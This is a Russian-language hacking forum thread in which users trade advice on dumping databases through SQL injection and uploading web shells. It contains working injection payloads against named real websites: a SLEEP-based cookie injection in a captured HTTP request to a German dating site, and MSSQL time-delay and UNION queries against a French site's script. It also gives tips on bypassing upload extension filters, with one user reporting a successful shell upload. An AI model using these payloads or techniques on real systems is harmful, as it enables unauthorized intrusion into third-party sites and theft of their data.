SQLYog. PHP Gate кидаешь на хост, где mysql расположен, с компа подключаешься. Единственный минус - будет долго рожать. Базы от нескольких гб - от получаса. Зато валидный дамп, что не может не радовать.
Ребят помогите советом ) При "расковыривании" инъекций допустим тайм блинд ,скл меп ,оооочень долго дампит ,допустим 1 фразу ,слово и тд и тп. Если варианты ,слить дб при таких инъекциях быстрее ?
слить быстрее через инъекцию основанную на задержках? ну не знаю склмап не всегда точно может определить подходящий для случая вектор, поэтому пробуйте сначала руками, и если есть другие варианты — автоматизируйте сами.
Есть замечательный вектор превращения Time-Based в Error-Based. Работает много где. Могу показать, если дашь линк.
Выковыривай админа и пробуй залить шелл через админку или если в самой админке есть сделать бэкап бд. так же не забывай про --passwords --users --hostname при удачном стечении обстоятельств можно подключиться напрямую к бд ) 2BigBear на таком получится? GET /registrierung/step0_vip.html HTTP/1.1 Cookie: PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=*; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0 X-Requested-With: XMLHttpRequest Referer: http://www.-----.de:80/ Host: www.lovepoint.de Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* Вектор PHPSESSID=kk7rupflro2bf33ljdq2d5pqp0; besuchersession=') AND SLEEP(5) AND ('KgRw'='KgRw; erstzugriff=kk7rupflro2bf33ljdq2d5pqp0
Вот пример из выше, сайт затер http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)=5,1,(select+1+union+select+2))=%271 TRUE - нет ошибки http://www.site.ru/?param=1%27+and+if(substr((select+@@version),1,1)=4,1,(select+1+union+select+2))=%271 FASLE - есть ошибка На этом попробуй также
blind-mssql Code: http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=2012319%20waitfor%20delay%20%270:0:10%27--+ union-based mssql: Code: http://www.cstb.fr/fileadmin/app/atec/modATEC/cpt.php?id_avi=-2012319%20UNION%20ALL%20SELECT%20@@version,%27lol%27-- тыкаешь на lol, смотришь вывод
Привет. Посоветуйте, что дальше делать если нашел на сайте phpinfo. Вроде инфа там написана, а что делать не знаю
Попей чаю, посмотри фильм, познай дзен в конце концов. Вывод функции phpinfo() раскрывает лишь служебную информацию, такую как настройки определённых переменных и полные пути к скриптам на сайте. Имея только чистый phpinfo() максимум, что можно провести Reflected-XSS через URL в старых версиях. Обычно этот файл используется в совокупности с другими уязвимостями. И практически никогда (за исключением выше написанного) - без них.
нашел в site/info.php других уязвимостей не нашел. спасибо А если хеш пароля не могу рашифровать онлайн, как еще можно разшифровать?
Еще одни вопрос. Нашел я на сайте папку manual -> site/manual/ здесь что то про apache. Можно что то вытащить?
Есть доступ в админке Торрент пиер, версия 2.4 Stable (R400). Добавлю php расширения чтоб залить шелл, загружаю пхп шелл, но расширении шелла после загрузки изменяется вот таком виде _php_. Есть ли еще способы залить шелл? Уважаемые помогите.
Видно что обрабатывается регуляркой, к перечисленному можно также поиграться с регистром букв в расширении.
Спасибо, сделал как вы сказали Шелл залился. но еще один косяк появился "403 Forbidden". Видимо там есть .htaccess. А можно ли таким способам залить пустой .htaccess?